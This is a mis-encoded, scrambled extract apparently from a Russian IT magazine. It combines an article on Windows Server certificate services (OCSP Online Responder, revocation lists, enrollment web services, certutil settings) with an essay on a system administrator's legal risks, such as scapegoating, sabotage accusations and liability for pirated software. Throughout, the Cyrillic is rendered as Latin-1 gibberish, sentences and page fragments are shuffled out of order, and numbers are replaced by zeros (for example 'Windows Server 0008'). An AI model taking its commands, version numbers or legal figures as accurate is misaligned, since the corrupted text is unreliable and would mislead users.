èçáåæàòü çàïðîñîâ ê CA íà íîâûå ñåðòèôèêàòû èç èíòåðíåòà. òî ìîæíî èñïîëüçîâàòü ðåæèì òîëüêî îáíîâëåíèÿ (renewal-only). Delta CRL ÷àñòè÷íî ðåøàþò ïðîáëåìû ñ îáúåìîì ñïèñêîâ îòçûâà. êîòîðûå ñîäåðæàò â ñåáå òîëüêî èíôîðìàöèþ î ñåðòèôèêàòàõ. êîòîðûå èñïîëüçóþòñÿ äëÿ øèôðîâàíèÿ). Online Responder òðåáóåòñÿ âíà÷àëå óñòàíîâèòü è íàñòðîèòü.  ýòîì ñëó÷àå êëèåíòû ïðè ïåðâîì ïîëó÷åíèè ñåðòèôèêàòà äîëæíû áûòü â òîé æå ñåòè. Åñëè â îðãàíèçàöèè áîëüøîå êîëè÷åñòâî ñåðòèôèêàòîâ. 128 XÀÊÅÐ 00 /141/ 00 . êàê îíè ìîãóò ïîäàâàòü çàïðîñ íà ñåðòèôèêàò è óñòàíàâëèâàòü åãî íà êîìïüþòåð? Ìîæíî. Ïðè òàêîì ñïîñîáå àóòåíòèôèêàöèè àâòîìàòè÷åñêàÿ ïîäà÷à çàÿâîê (autoenrollment) íåäîñòóïíà äëÿ êîìïüþòåðîâ. Êîìïîíåíò Online Responder èñïîëüçóåò ïðîòîêîë OCSP (Online Certificate Status Protocol). èñïîëüçóåò äëÿ ïîäà÷è çàÿâîê íîâûé ïðîòîêîë WS-Trust. íî íå ðåøàþò âñåõ ïðîáëåì. ÷åì èñïðàâèòü òî. êîòîðûå íàêëàäûâàþòñÿ íà ñåðòèôèêàòû (íàïðèìåð.  îòëè÷èå îò èñïîëüçîâàíèÿ ñïèñêîâ îòçûâà. ÷òî ñåðòèôèêàò óæå îòîçâàí. Îíè ìîãóò áûòü íàñòðîåíû ñ ïîìîùüþ íîâûõ ïàðàìåòðîâ ãðóïïîâîé ïîëèòèêè (Certificate Path Validation Settings âêëàäêà Revocation). íàïðèìåð. êàê ýòî ñäåëàòü. òî ìîæåò áûòü òàêàÿ ñèòóàöèÿ.SYN/ACK Оснастка Enterprise PKI Установка служб Certificate Enrollment Web Services ñâîåé ñèñòåìå íåîáõîäèìûé øàáëîí. êîãäà îíè. ÷òîáû áûòü óâåðåííûì. Ñòàðàÿ áèáëèîòåêà XEnroll. Êëèåíòû. Íîâûå ñåðâèñû – Certificate Enrollment Policy Web Service è Certificate Enrollment Web Service – ïîçâîëÿþò ïîëó÷èòü ïîëèòèêè è ïîäàòü çàÿâêè íà ñåðòèôèêàòû ÷åðåç HTTPS.dll. à êàêèì îáðàçîì ïîëüçîâàòåëè è êîìïüþòåðû ïîëó÷àþò ñåðòèôèêàòû? Èíà÷å ãîâîðÿ. à êëèåíòû ïðè ïðîâåðêå ñòàòóñà ñåðòèôèêàòà áóäóò æäàòü çàêà÷êè ñïèñêà. êàê â ñëó÷àå êîìïðîìåòàöèè êëþ÷à. òî ñïèñîê áóäåò áûñòðî ðàñòè. íàäî ïîëó÷èòü ñïèñîê îòçûâà è ïðîâåðèòü íàëè÷èå â íåì ðàññìàòðèâàåìîãî ñåðòèôèêàòà. íî åñòü êëèåíòû. ñâÿçàííûõ ñ àêòóàëüíîñòüþ èíôîðìàöèè. Øàáëîí íåîáõîäèìî ñîçäàâàòü ÷åðåç ñòàíäàðòíóþ îñíàñòêó certtmpl. îáíîâëåíèÿ ñåðòèôèêàòîâ ìîãóò âîñïîëüçîâàòüñÿ âîçìîæíîñòÿìè CA Web Enrollment. CA Web Enrollment. îïèñàííûé â RFC 0560.  Windows Server 0008 è áîëåå ðàííèõ âåðñèÿõ äëÿ àóòåíòèôèêàöèè ïîëüçîâàòåëåé è êîìïüþòåðîâ ïðè çàïðîñå ñåðòèôèêàòîâ èñïîëüçîâàëñÿ ïðîòîêîë Kerberos. Êîìïîíåíò Web Enrollment. êîòîðûå íå âõîäÿò â äîìåí èëè íå èìåþò ïðÿìîãî äîñòóïà â ñåòü ñ CA. Ñåðòèôèêàò ìîæåò áûòü îòîçâàí. êîòîðûå íå ïîäñîåäèíåíû ê êîðïîðàòèâíîé ñåòè.  ðåçóëüòàòå ïîëüçîâàòåëü ìîæåò äàæå íå ïîäîçðåâàòü. Îòâåò÷èê ðàçáèðàåò çàïðîñû îò êëèåíòîâ. íî íå âñåãäà åñòü âîçìîæíîñòü îáúÿñíèòü ïîëüçîâàòåëÿì. Ïðîòîêîë OCSP ïîääåðæèâàþò êëèåíòû. ñìåíå äîëæíîñòè èëè ôàìèëèè. àâòîìàòè÷åñêàÿ ïîäà÷à çàÿâîê íå ïîääåðæèâàåòñÿ. áåç íåîáõîäèìîñòè ìíîãîêðàòíûõ çàïðîñîâ ê ñåðâåðó. Ïîëèòèêè äëÿ ýòèõ ñëóæá íàñòðàèâàþòñÿ ÷åðåç ãðóïïîâûå ïîëèòèêè èëè íà êëèåíòå.  Windows Server 0008 ïîÿâèëèñü ñåòåâûå îòâåò÷èêè (Online Responder). òàê êàê èõ äîñòàòî÷íî ïîëó÷èòü îäèí ðàç. Êðîìå îáû÷íûõ ñïèñêîâ ñóùåñòâóþò åùå è ðàçíîñòíûå (Delta CRL). íàïðèìåð. à â êà÷åñòâå òðàíñïîðòíîãî ïðîòîêîëà – Distributed COM (DCOM). Åñëè ïîëüçîâàòåëü äîìåííûé è ïîäêëþ÷åí ê êîðïîðàòèâíîé ñåòè. Òðàäèöèîííî èíôîðìàöèÿ îá îòîçâàííûõ ñåðòèôèêàòàõ ïîìåùàåòñÿ â ñïèñêè îòçûâà (CRL (certificate revocation list)).msc. Web Enrollment ïîçâîëÿåò ïîäàâàòü çàÿâêè â ôîðìàòå PKCS #10 èëè ñîçäàâàòü çàïðîñû èíòåðàêòèâíî ÷åðåç áðàóçåð. îöåíèâàåò ñòàòóñ ñåðòèôèêàòà è îòïðàâëÿåò îáðàòíî ïîäïèñàííûé îòâåò ñ èíôîðìàöèåé î ñòàòóñå çàïðîøåííîãî ñåðòèôèêàòà. НОВЫЕ СПОСОБЫ ЗАПРОСА СЕРТИФИКАТОВ Êñòàòè.

êîòîðûé áóäåò èñïîëüçîâàòüñÿ îòâåò÷èêîì. çíà÷èòåëüíî ðàñøèðèëèñü ñïîñîáû çàïðîñà è ïîëó÷åíèÿ ñåðòèôèêàòîâ. äîëæåí îáëàäàòü ñëåäóþùèìè àòðèáóòàìè: êîðîòêèé ñðîê äåéñòâèÿ (íåñêîëüêî íåäåëü). êîãäà ïðîèñõîäèò îáíîâëåíèå êëþ÷à CA. Crypto API è XEnroll. à àìåðèêàíñêèå ñòàíäàðòû. 4.  èòîãå ïîÿâèëèñü âîçìîæíîñòè. Â-òðåòüèõ. êîòîðûé óæå íå îäèí ãîä ïðèñóòñòâîâàë â äðóãèõ ïðîãðàììíûõ ïðîäóêòàõ. Íåìàëîâàæíî è ïîÿâëåíèå ïîääåðæêè àëãîðèòìîâ íà ýëëèïòè÷åñêèõ êðèâûõ.dll) ïåðåïèñàíû ñ íóëÿ. Âî-ïåðâûõ. ïîäïèñàííîãî òåì æå êëþ÷îì CA. Äëÿ StandAlone CA íàäî åùå ìåíÿòü çíà÷åíèå ñîîòâåòñòâóþùåãî ôëàãà êîìàíäîé certutil -v -setreg policy\editflags +EDITF_ ENABLEOCSPREVNOCHECK. íàêîíåö-òî äîøåë äî ñåðâåðíûõ ÎÑ Microsoft. Òàêèì îáðàçîì. íàñòðîèâ íà íåãî ðàçðåøåíèÿ (Read è Enroll) äëÿ ñåðâåðà. èíñòðóìåíòû. íåîáõîäèìî ðàçðåøèòü îáíîâëåíèÿ ñåðòèôèêàòîâ Online Responder ñ èñïîëüçîâàíèåì ñóùåñòâóþùèõ êëþ÷åé öåíòðà ñåðòèôèêàöèè. ÷òîáû ïîêðûòü ñðîê äåéñòâèÿ äâóõ ñåðòèôèêàòîâ CA. Äëÿ ýòîãî íàäî âûïîëíèòü íà CA êîìàíäó certutil -setreg ca\UseDefinedCACertInRequest 0. îòñóòñòâèå CDP è AIA.  Windows 0003 äëÿ ðàçðåøåíèÿ ýòîé ñèòóàöèè íåîáõîäèìî âðó÷íóþ XÀÊÅÐ 00 /141/ 00 ñîçäàòü ñòîëüêî ñåðòèôèêàòîâ äëÿ ïîäïèñè îòâåòîâ OCSP. Äëÿ êîððåêòíîé ðàáîòû Online Responder â ïåðèîä. è â R2. íà êîòîðûé óñòàíîâëåí Online Responder. íî îæèäàòü èíîãî áûëî áû ñòðàííî. ñòàòóñ êîòîðîãî çàïðàøèâàåòñÿ. ìíîãèå áèáëèîòåêè (íàïðèìåð.Настройка enrollment policy Настройка AIA про Online Responder Мастер добавления Revocation Configuration 2. Òàê êàê îòâåò î ñòàòóñå ñåðòèôèêàòà ïîäïèñûâàåòñÿ. 5. íàëè÷èå ðàñøèðåíèÿ id-pkix-ocsp-nocheck è ðàñøèðåííîãî èñïîëüçîâàíèÿ êëþ÷à id-kp-OCSPSigning. Äàííîå äåéñòâèå íåîáõîäèìî äëÿ ïîëó÷åíèÿ âîçìîæíîñòè ïîäïèñûâàòü îòâåòû Online Responder ñ ïîìîùüþ ñåðòèôèêàòà. è ïîëüçîâàòåëè áåç ïðÿìîãî äîñòóïà ê ñåòè ñ CA. è ôóíêöèè. áåç âíèìàíèÿ íå îñòàâëåíû è ëþáèòåëè àâòîìàòèçàöèè è ñêðèïòîïèñàíèÿ – íîâûå îáúåêòû è ôóíêöèè ïîçâîëÿò èì ðåàëèçîâàòü ñâîè ôàíòàçèè. Âî-âòîðûõ. ÷åì ó ïðåäûäóùåãî. êîòîðûå ïîçâîëÿþò âûáèðàòü ìåæäó ñêîðîñòüþ.  ñâîéñòâàõ CA äëÿ AIA óêàçàòü ïóòü. îáúåìîì äàííûõ è àêòóàëüíîñòüþ èíôîðìàöèè. òî äëÿ ðàáîòû Online Responder òðåáóåòñÿ ñîîòâåòñòâóþùèé ñåðòèôèêàò. È íàêîíåö. ïîääåðæèâàþòñÿ íå ðîññèéñêèå. Ê ñîæàëåíèþ. 3. êîòîðûå îáëåã÷àò æèçíü àäìèíèñòðàòîðà. êîòîðûå ïîçâîëÿò ïîëüçîâàòåëÿì åùå ìåíüøå ðàçáèðàòüñÿ â ñåðòèôèêàòàõ. Ïðè ýòîì ñðîê äåéñòâèÿ êàæäîãî èç âûïóùåííûõ ñåðòèôèêàòîâ äîëæåí áûòü íà äâå íåäåëè áîëüøå. z 129 . Äåéñòâèÿ ïî íàñòðîéêå øàáëîíà â Windows Server 0003 îòëè÷àþòñÿ è çäåñü íå ðàññìàòðèâàþòñÿ. äîáèâàëàñü ïîääåðæêà íîâûõ ïðîòîêîëîâ è êðèïòîãðàôè÷åñêèõ àëãîðèòìîâ. Íà ïîñëåäíåì ýòàïå íåîáõîäèìî íàñòðîèòü ñàì ñåòåâîé îòâåò÷èê. êîòîðûé èñïîëüçîâàëñÿ äëÿ ïîäïèñàíèÿ ñåðòèôèêàòà. èç-çà ÷åãî ìîæíî íàäåÿòüñÿ íà èçáàâëåíèå îò ñòàðûõ îøèáîê è ïðîáëåì. è æäàòü íîâûõ. Äëÿ ýòîãî â îñíàñòêå Online Responder Management ñ ïîìîùüþ ìàñòåðà íàäî ñîçäàòü revocation configuration. Ñåðòèôèêàò. Ïðîòîêîë OCSP. Ýòè àòðèáóòû óæå íàñòðîåíû â øàáëîíå OCSP Response Signing. Òåïåðü ñåðòèôèêàòû ìîãóò ïîëó÷àòü è ñåòåâûå óñòðîéñòâà áåç çàïèñè â äîìåíå. ЗАКЛЮЧЕНИЕ Âèäîèçìåíåíèÿ ñëóæá ñåðòèôèêàöèè ïðîèçâîäèëèñü è â Windows Server 0008. êîòîðûå áóäóò èíòåðåñíû ñïåöèàëèñòàì ïî áåçîïàñíîñòè. ó àäìèíèñòðàòîðîâ è ïðîãðàììèñòîâ ïîÿâèëèñü ðàçëè÷íûå âàðèàíòû äëÿ ïðîâåðêè ñòàòóñà îòîçâàííûõ ñåðòèôèêàòîâ. ñêîëüêî òðåáóåòñÿ. ïî êîòîðîìó äîñòóïåí îòâåò÷èê.  ñëó÷àå èñïîëüçîâàíèÿ Enterprise CA íàäî òîëüêî äîáàâèòü åãî ê äîñòóïíûì øàáëîíàì â Active Directory.

Ïîýòîìó â ñåðüåçíûõ êîíòîðàõ åãî ïðîèçâîäñòâåííûå ôóíêöèè äåëÿò ìåæäó äâóìÿ-òðåìÿ ðàáîòíèêàìè. ñâÿçàííûå ñ êîìïüþòåðíîé òåõíèêîé. ìîæíî ïàðàëèçîâàòü íà ïîëäíÿ ðàáîòó îôèñà. ÷òî íåóìåëûé èëè íåàäåêâàòíûé ÷åëîâåê ïåðåä ìîíèòîðîì ìîæåò íàâðåäèòü ëèøü ñåáå ñàìîìó è ñâîèì äàííûì. Ïðè ïîëíîì áàðäàêå íà ïðåäïðèÿòèè è äåñÿòêàõ íåäîâîëüíûõ. ëîãè÷íåå âñåãî ïåðåâàëèòü íà àäìèíà. î÷åíü ìàëàÿ. Соответственно со сим — да его ответственность. Êîììåð÷åñêàÿ òàéíà. ÷òî êîå-ãäå êîìïüþòåðû ïîäêëþ÷åíû ê ðàçíûì àâòîìàòèçèðîâàííûì ïðîèçâîäñòâàì è ê èíòåðíåòó îäíîâðåìåííî. à ñèñàäìèí ïîëó÷èë ñðîê ïî ñòàòüå 072 (íåïðàâîìåðíûé äîñòóï). Äëÿ òîãî. XÀÊÅÐ 00 /141/ 00 . íàðóøåíèÿ è íåäîñòà÷è.. Âûÿâëÿåòñÿ îäèí ñëó÷àé õèùåíèÿ (÷åðåç ïîäòàñîâêó äàííûõ â áèëëèíãîâîé ñèñòåìå). à òî÷íåå — ñâàëèòü âèíó íà äðóãîãî. ×òîáû èìåòü ïðàâî ñåñòü çà ðóëü àâòîìîáèëÿ (èñòî÷íèê ïîâûøåííîé îïàñíîñòè). íî íèêòî íå ãîðèò æåëàíèåì âîçëîæèòü íà ñåáÿ ÷àñòü îòâåòñòâåííîñòè çà òî. Âñå ðàâíî êðîìå íåãî â ýòèõ ãóäÿùèõ ýëåêòðîííûõ øòóêàõ íèêòî íå ðàçáèðàåòñÿ. òåì ñòðîæå îòáîð â ñîîòâåòñòâóþùóþ ïðîôåññèþ. Íà îäíîãî ïîäîçðåâàåìîãî âàëèëè âñå õèùåíèÿ. ðàáîòíèêè ðàçáåãàþòñÿ. îêàçûâàþùåå óñëóãè ñâÿçè. Èõ ïðîèçâåäåíèå (ñòîèìîñòü ðèñêà) ïîëó÷àåòñÿ âíóøèòåëüíîå. êîíå÷íî. âàæíîñòü (îïàñíîñòü) ñèñàäìèíà óæå îñîçíàëè. ýòî íå ìû ïëîõî ðàáîòàëè. Ëþáûå íåóäà÷è è ïîòåðè. È ñóùåñòâóåò òåîðåòè÷åñêàÿ âîçìîæíîñòü íåñêîëüêèìè êîâàðíûìè êëèêàìè ìûøè èç-çà ìîðÿ óðîíèòü ñïóòíèê. Äëÿ óïðàâëåíèÿ àòîìíîé ñòàíöèåé èëè ïîäëîäêîé-íîñèòåëåì ßÎ ïåðñîíàë òåñòèðóþò òùàòåëüíåå. áóääèñòàì è ïîõ. Ñèòóàöèÿ ìåíÿåòñÿ äîâîëüíî áûñòðî. ÷èòàòåëÿ. ðàññêàçûâàþò (íî ÷àùå ïîêàçûâàþò â ôèëüìàõ). ÷òî ñòàíóò âûòâîðÿòü â Ñåòè ïîëüçîâàòåëè ñ âûïèñàííûìè èìè «ïðàâàìè». âñå ïðè÷àñòíûå ýòî ñ ðàäîñòüþ ïîäòâåðæäàëè. È ïîëó÷èòü ñîîòâåòñòâóþùèé äîêóìåíò. íî çàòî ïîòåíöèàëüíûé óùåðá îãðîìåí. Äàëåå äåëî ïîøëî ïî äàâíî íàêàòàííîé (êîå-ãäå ó íàñ ïîðîé) îáâèíèòåëüíîé êîëåå. репутацией компании. Ïåðå÷èñëèì îñíîâíûå ðèñêè. ÷òîáû äåðæàòü â ðóêàõ àâòîìàò Êàëàøíèêîâà. Ïðîùåëêàâ âèðóñ. ×òîáû îäèí çíàë. ñàìîëåò. Íàøëè ïîñëóøíîãî ýêñïåðòà. Ведь нате самом деле менеджер рулит малограмотный техникой. Ïðè ýòîì íå òàê âàæíî. à ïî îáúåìó — òàê èõ ïðîñòî ïó÷èò. Êîìïàíèÿ âñå ðàâíî ðàçîðèëàñü. Êðîìå òîãî. îòáîð íå òàêîé ñòðîãèé: îòñåèâàþò ëèøü îòêðîâåííûõ ïñèõîâ è óãîëîâíèêîâ. ïîìèìî èõ æåëàíèÿ). íî ñëåäñòâèå ýòî îáñòîÿòåëüñòâî íå çàèíòåðåñîâàëî). äîäóìàëèñü. çà êàæäóþ çàïèñü. êóðñ ìåñòíîé âàëþòû èëè äàæå àâòîðèòåò ìåñòíîãî ïðåçèäåíòà. Äî ëèöåíçèé íà ïðàâî óïðàâëåíèÿ êîìïüþòåðîì ïîêà íå äîäóìàëèñü (âåðíåå. Îñòàëüíûì îðóæèå ìîæíî (íåêîòîðûì äàæå íóæíî. èíòåëëåêòóàëüíàÿ ñîáñòâåííîñòü. Àëêîãîëèêàì. лучший чартист компании «InfoWatch» Риски системного администратора СЕМЬ И ЕЩЕ ОДИН СПОСОБ ПОДВЕСТИ СИСАДМИНА ПОД МОНАСТЫРЬ Со временем эксплуатация на должности сисадмина становится постоянно более и больше рискованной. èíñàéäåðñêàÿ èíôîðìàöèÿ ðàñòóò â öåíå áûñòðåå çîëîòà. НЕПРЕРЫВНОСТЬ БИЗНЕСА Ïåðâûé è îñíîâíîé ðèñê ñèñàäìèíà — ñàìûé íåèíòåðåñíûé. ôàòàëèñòàì òàì íå ìåñòî. ïåðåä ðåãóëèðóþùèìè îðãàíàìè. ïåðåä êðåäèòîðàìè è ïàðòíåðàìè. À óêðàâ ìà-à-à-àëåíüêóþ ôëåøêó ñ òðåìÿ ìèëëèîíàìè çàïèñåé. ðóêîâîäñòâó ïðåäïðèÿòèÿ òîæå íàäî îò÷èòûâàòüñÿ: ïåðåä àêöèîíåðàìè. Òàê îíî è áûëî ëåò äâàäöàòü íàçàä. Ñ÷èòàåòñÿ. à âîçâðàùàòü åãî íå÷åì. íå ïîëó÷àþùèõ çàðïëàòó ðàáîòíèêàõ íàéòè îäèí ñëó÷àé õèùåíèÿ — íå ïðîáëåìà.. Ó ðóêîâîäñòâà ïîÿâèëèñü îïðàâäàíèÿ ïåðåä êðåäèòîðàìè — äåñêàòü. íî è ïîëó÷èòü âîçìåùåíèå óáûòêîâ â ãðàæäàíñêîì ïîðÿäêå. ó ðóêîâîäñòâà ìîæåò âîçíèêíóòü èäåÿ ïîäâåðãíóòü åãî íå òîëüêî äèñöèïëèíàðíîé îòâåòñòâåííîñòè. ôàëüñèôèöèðóþòñÿ äîêàçàòåëüñòâà è ïîäàåòñÿ ñîîòâåòñòâóþùåå çàÿâëåíèå â ïðàâîîõðàíèòåëüíûå îðãàíû. âîëíóþò ñîâñåì äðóãèå ðèñêè: ÷òî ãðîçèò ñàìîìó àäìèíó 130 â ñëó÷àå íåóäà÷íîãî ñî÷åòàíèÿ çâåçä íàä åãî ãîëîâîé. «íåïðàâèëüíûå» èãíîðèðîâàëèñü. Äåëî ñøèòî è ïåðåäàíî â ñóä. а деньгами. нематериальными активами. ïîäîøëî ê ãðàíè ïîëíîãî áàíêðîòñòâà: äîõîäû ïàäàþò. ÷òî èìåííî íàïèñàíî â òðóäîâîì äîãîâîðå: êàæäûé ÷åëîâåê äîëæåí âîçìåùàòü ïðè÷èíåííûå èì óáûòêè.. â ýòîì îáâèíÿåòñÿ ñàìûé áåççàùèòíûé èç ðàáîòíèêîâ (íåäàâíî óâîëèâøèéñÿ). ÷òîáû îíè íå ñãîâîðèëèñü. Âïèñàòü â ëîã-ôàéë íóæíûé IP-àäðåñ è çàêðåïèòü ýòî àêòîì îñìîòðà — òîæå íå âîïðîñ (íåêîòîðûå èç èíæåíåðîâ îòêàçàëèñü ïîäïèñûâàòü ýòîò àêò. êðåäèò ïîñïåë. Âåðîÿòíîñòü.SYN/ACK Николай Николаевич Федотов. ñóèöèäíèêàì. òàêæå òðåáóåòñÿ äîêàçàòü. Äëÿ óïðàâëåíèÿ êîìïüþòåðîì ñïåöèàëüíîé ëèöåíçèè íå ïðåäóñìîòðåíî. Îòâåòñòâåííîñòü àäìèíà — ñîîòâåòñòâóþùàÿ. Ïðîáëåìîé áûëî áû íå çàìå÷àòü âîðîâñòâà. Âïðî÷åì. ÷òî âåëåë ñëåäîâàòåëü. Èíôîðìàöèÿ äîðîæàåò. ДЕРЖАЩИЙ ЗА ЧУВСТВИТЕЛЬНЫЕ МЕСТА ×åì äîðîæå ìîæåò îáîéòèñü èíöèäåíò.  ïðàêòèêå àâòîðà áûë òàêîé ñëó÷àé. à òðåòèé (ðîäñòâåííèê äèðåêòîðà) ïðèãëÿäûâàë çà ýòèìè äâóìÿ ãðàìîòåÿìè.. людьми. À ïðîñòóþ áóìàæêó «Computer drive licence» ìîãóò âûïèñàòü ëþáîìó æåëàþùåìó). íî íå çíàë. êîòîðûé è íàïèñàë â çàêëþ÷åíèè òî. íàâåðíîå. ÷òî ïðåòåíäåíò â ñîñòîÿíèè îòâå÷àòü çà ñâîè äåéñòâèÿ. Ïðåäïðèÿòèå. Îäíàêî. ìîæíî âûðó÷èòü íà ÷åðíîì ðûíêå àæ 00 àìåðèêàíñêèõ öåíòîâ. äðóãîé ìîã. Êðîìå òîãî. è èç-çà ýòîãî ïðåäïðèÿòèå ïîíåñåò óáûòêè. íî íå ìîã. È òîãäà äèðåêòîð äåëàåò îò÷àÿííóþ ïîïûòêó ñïàñòè ïîëîæåíèå. «Ïðàâèëüíûå» ïîêàçàíèÿ ñâèäåòåëåé ñîáèðàëèñü. ýòî âîò îí âñå óêðàë. Åñëè îí áóäåò íåðàäèâî èñïîëíÿòü äîëæíîñòíûå îáÿçàííîñòè.

Íûíå â Ðîññèè çà íàðóøåíèå àâòîðñêèõ ïðàâ â ðàçìåðå ìåíüøå 00 òûñÿ÷ ðóáëåé ïðåäóñìîòðåíà àäìèíèñòðàòèâíàÿ îòâåòñòâåííîñòü (ñò.internet-law. ïðåäïðèÿòèå íå çàêëþ÷èëî ëèöåíçèîííûé äîãîâîð ñ ïðàâîîáëàäàòåëåì). êîãäà íà÷íåòñÿ èíäóñòðèàëèçàöèÿ. ïðè÷åì ëèøü â òîì ñëó÷àå. çàïóùåííûõ ñëó÷àÿõ — âðåäèòåëüñòâî. Íà ïðàêòèêå ÷àùå âñåãî äåëàþò îáâèíÿåìûì èìåííî àäìèíèñòðàòîðà èëè ýíèêåéùèêà. Ïîíÿòíî. Âî âðåìåíà èíûå ñòèõèè â òåõíèêå âîîáùå íå ïðèçíàâàëè: òåõíèêà-äå âåùü äåòåðìèíèðîâàííàÿ. Ýòîò òåðìèí îçíà÷àåò. Êðîìå ïðîãðàìì äëÿ ÝÂÌ. Èì ÷àñòî ñòàíîâèòñÿ ñèñàäìèí. õóäîæåñòâåííûå òåêñòû. Íå íàéòè — òàê íàçíà÷èòü.  îáîèõ ñëó÷àÿõ âñå ëîìàåòñÿ è ñòîïîðèòñÿ (êîíêðåòíûå ïðè÷èíû àéòèøíîãî ñàáîòàæà ñìîòðè íà äèàãðàììå). ñîãëàñíî ðàñ÷åòàì BSA è IFPI. â ïðîãðàììíîì îáåñïå÷åíèè. Íà ïðàêòèêå ñ îðãàíîâ òðåáóþò ïëàí ïî ðàñêðûâàåìîñòè è îðãàíû åãî äàþò. Êðîìå òîãî. ÷òî îíî êîíòðàôàêòíîå (òî åñòü. ÷òî ñîâðåìåííàÿ òåõíèêà âîâñå íå äåòåðìèíèðîâàíà è âïîëíå ìîæåò íåïðåäñêàçóåìî âûéòè èç-ïîä êîíòðîëÿ.12 ÊîÀÏ). åñëè ÷òî. ýëåìåíòû äèçàéíà). Íî äàæå êîãäà âñå ñëîìàëîñü ïî ñòèõèéíûì ïðè÷èíàì. ïîñêîëüêó áóðæóè íå áóäóò ìîë÷à òåðïåòü. Ïèðàòû.htm). à òàêæå øðèôòû. à íå ïî âèíå) íà áåçîòâåòíîãî è þðèäè÷åñêè áåçãðàìîòíîãî ñèñàäìèíà. îáîñòðÿåòñÿ áîðüáà çà íèõ.САБОТАЖ Êàê èçâåñòíî. À ïîýòîìó íóæíû ïîñàäêè. äîëæíû íàíîñèòü óùåðá ïðàâîîáëàäàòåëÿì âî âñå âîçðàñòàþùèõ ìàñøòàáàõ. ó íà÷àëüñòâà ÷àñòî ïîÿâëÿåòñÿ ïîäîçðåíèå íà çëîé óìûñåë. Ó÷åíûå ïðèçíàëè. Ñ íåãî è ãëàâíûé ñïðîñ. ÷òî ñòèõèéíàÿ ñèëà ìîæåò äåéñòâîâàòü íå òîëüêî â äèêîé ïðèðîäå. à äëÿ áîëüøåãî ðàçìåðà — óãîëîâíàÿ (÷. Ïðè÷åì ñâîåâðåìåííûì ñîñòàâëåíèåì. ðàáîòíèêè âûðàæàþò ñâîå íåäîâîëüñòâî ðàçíûìè ñïîñîáàìè. à íå ñèñàäìèí. ÷òî áëàãîðîäíûõ äîíîâ. Âñå ýòè îáúåêòû â öèôðîâîé ôîðìå. âñå îíè äðóæíî ïî ïîäñêàçêå ñëåäîâàòåëÿ óêàæóò ïàëüöåì íà àäìèíà: «Ýòî îí âñå óñòàíàâëèâàë». 046 ÓÊ). Àâòîð 131 . àäåïòû ãóìàíèçìà äîäóìàëèñü äî êîíöåïöèè òåõíîãåííîé êàòàñòðîôû. à â îòäåëüíûõ. òî ìîãóò îáîéòèñü è áåç åãî ó÷àñòèÿ (çà ïîäðîáíîñòÿìè ïðîøó ïðîñëåäîâàòü â ×àÂî ïî êîìïüþòåðíûì ïðåñòóïëåíèÿì îò ñåòåâûõ ïðàâîâåäîâ: http://www. Êîãäà òåõíîãåííàÿ êàòàñòðîôà ìåñòíîãî ìàñøòàáà ïðîèçîøëà. Ïëþñ ãðàæäàíñêî-ïðàâîâàÿ â êà÷åñòâå äîâåñêà â îáîèõ ñëó÷àÿõ. â ÷àñòíîñòè. äðóãèå — ê ïóíêòóàëüíîìó è äîñëîâíîìó èõ èñïîëíåíèþ. òàê è ïðåäïðèÿòèå. À ïîêàçàíèÿ ñâèäåòåëåé â ñóäàõ «âåñÿò» çíà÷èòåëüíî òÿæåëåå. à çà ñ÷åò óâåëè÷åíèÿ ÷èñëà îáúåêòîâ èíòåëëåêòóàëüíîé ñîáñòâåííîñòè â äåÿòåëüíîñòè ïðåäïðèÿòèÿ è ñêîðîñòè ñìåíû «ïîêîëåíèé» ñîôòà). Îò ýòîãî íàçíà÷åíèÿ ñèñàäìèí ìîæåò ñïàñòèñü ëèøü ñîñòàâëåíèåì ïðàâèëüíûõ áóìàã. òî ëè ðåøåíèå çàäà÷è ïîäîãíàëè ïîä îòâåò. ñðåäè ðàáîòíèêîâ íå íàéäåòñÿ. ïèñàòü îáúÿñíèòåëüíûå óæå ïîçäíî. ôîòîãðàôèè. îáúåêòû èçîáðàçèòåëüíîãî èñêóññòâà (ðèñóíêè. Ñëåäóåò ïðèãëàñèòü þðèñòà è ïîðàáîòàòü íàä áþðîêðàòè÷åñêèì ïðèêðûòèåì ñâîåé ôèëåéíîé ÷àñòè çàáëàãîâðåìåííî. Íî ýòó ïðàâîâóþ íîâåëëó äàëåêî íå âñå ïðèíèìàþò. åñëè òî÷íî çíàë. íî è â íåäðàõ òâîðåíèÿ ðóê ÷åëîâå÷åñêèõ. êòî èíñòàëëèðîâàë êîíòðàôàêòíîå ÏÎ. òî êòî-òî ýòî óñòðîèë — íàéòè è íàêàçàòü!  êîíöå XX âåêà ïðîãðåññèâíûå ìûñëèòåëè. âû èìååòå âûñîêèå øàíñû ñäåëàòüñÿ êîçëîì îòïóùåíèÿ. åñëè ÷òî-òî ïîøëî íå òàê. Ñêîðåå âñåãî. Ïîýòîìó òðåáóåòñÿ êîçåë îòïóùåíèÿ. 0. àóäèîêíèãè). ÷òî âðåìåíè íà ñáîð äîêàçàòåëüñòâ î÷åíü ìàëî. Äëÿ âîçáóæäåíèÿ äåëà çàÿâëåíèÿ ïðàâîîáëàäàòåëÿ íå òðåáóåòñÿ. Ïëàí îáû÷íî òàêîâ. åñëè â âàøåì õîçÿéñòâå âîäèòñÿ êîíòðàôàêòíîãî ñîôòà áîëåå ÷åì íà 00 000 ñîâîêóïíî. àóäèîâèçóàëüíûå ïðîèçâåäåíèÿ (ôèëüìû. íî ðåïðåññèè ïðîòèâ áóðæóåâ è èõ ïðèñïåøíèêîâ ïîøëè ñ ýòîãî ãîäà íàðàñòàþùèìè òåìïàìè. êëèïû). Áîëüøå âñåãî âîçìîæíîñòåé ó÷èíèòü ñàáîòàæ èëè ïðåñå÷ü åãî — ó àäìèíà. Òàê íàçûâàåìîå «äåëî Ïîíîñîâà» ïðåäñòàâëÿëî ñîáîé ñâîåãî ðîäà èñêëþ÷åíèå: îáâèíÿåìûì ñòàë äèðåêòîð îðãàíèçàöèè. АВТОРСКИЕ ПРАВА Òàê íàçûâàåìûå ïðàâà èíòåëëåêòóàëüíîé ñîáñòâåííîñòè íà ïðîãðàììû äëÿ ÝÂÌ è ïðî÷èé öèôðîâîé êîíòåíò íå òîëüêî äîðîæàþò (ïðè÷åì íå çà ñ÷åò ïîâûøåíèÿ öåí íà êàæäóþ ëèöåíçèþ. åñëè îíè íå îïëà÷åíû. Òàê îíî è ïðîèñõîäèò. Ïî çàêîíó. ÑîâåðXÀÊÅÐ 00 /141/ 00 øåííî àíàëîãè÷íàÿ ñèòóàöèÿ ñëîæèëàñü ñ àâòîðñêèìè ïðàâàìè â íàøå âðåìÿ. îáúåêòàìè àâòîðñêîãî ïðàâà ÿâëÿþòñÿ ôîíîãðàììû 